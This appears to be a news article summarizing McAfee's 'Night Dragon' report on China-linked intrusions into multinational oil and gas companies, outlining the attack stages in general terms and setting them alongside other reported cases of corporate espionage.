‘Night Dragon’ Espionage Report

Hackers working in China broke into the computer networks of five multinational oil and gas companies, stealing bidding plans and other critical information, McAfee said in a report.   The attacks have been dubbed “Night Dragon” and the report did not identify the companies that were hacked.  The report did say that another seven or more had also been compromised, but may not have had data stolen.

This issue “speaks to quite a sad state of our critical infrastructure security.  These attacks have involved social engineering, spear-phishing attacks, exploitation of Microsoft Windows operating systems vulnerabilities, Microsoft Active Directory compromises, and the use of remote administration tools (RATs) in targeting and harvesting sensitive competitive information.

“These were not sophisticated attacks.  Yet they were very successful in achieving their goals,” said Dmitri Alperovitch, McAfee’s VP of threat research.  The hackers got into the computers either through public websites or through infected emails sent to company executives.  The Night Dragon attacks work through methodical and progressive intrusions.

These basic activities were performed by the Night Dragon operation:

  • Company extranet web servers compromised through SQL-injection techniques, allowing remote command execution.
  • Common hacker tools are uploaded to compromised web servers, allowing access to the intranet, sensitive desktops, and servers internally.
  • Password cracking and pass-the-hash tools gain additional usernames and passwords, allowing further authenticated access to sensitive internal desktops and servers.
  • The compromised web servers become command and control servers.
  • Disabling Internet Explorer (IE) proxy settings allows direct communication from infected machines to the Internet.
  • Remote Access malware allows attackers to connect to other machines, targeting executives, to exfiltrate email archives and other sensitive documents.

The tools, techniques, and network activities used in these continuing attacks have been identified as originating primarily in China. Through coordinated analysis of the related events and tools used, McAfee has determined identifying features to assist companies with detection and investigation. While many actors may have participated in these attacks, one individual has been identified who has provided the crucial C&C infrastructure to the attackers.  During the last two years, and possibly as late as four years ago, the hackers had access to these networks.  They focused on financial documents related to oil and gas field exploration and bidding contracts.  They also copied proprietary industrial processes that are “tremendously sensitive and would be worth a huge amount of money” to competitors.

The hack was traced back to China via a server leasing company in Shandong Province that hosted the malware, and to Beijing IP addresses that were active from 9 a.m. to 5 p.m. Beijing time.  Western governments and companies have long been concerned about Chinese corporate espionage.  Washington believes that hacking attacks on Google that prompted the company to pull out of China for a brief period of time were orchestrated by two members of the country’s ruling body, according to leaked U.S. diplomatic cables.  The French government is looking into a possible Chinese role in spying on carmaker Renault SA’s and Nissan’s electric vehicle programs.  In 2007, a Chinese student working at car parts maker Valeo was sentenced to prison for stealing confidential documents.  A French tribunal stopped short of an industrial espionage verdict, instead finding that she had “abused trust.”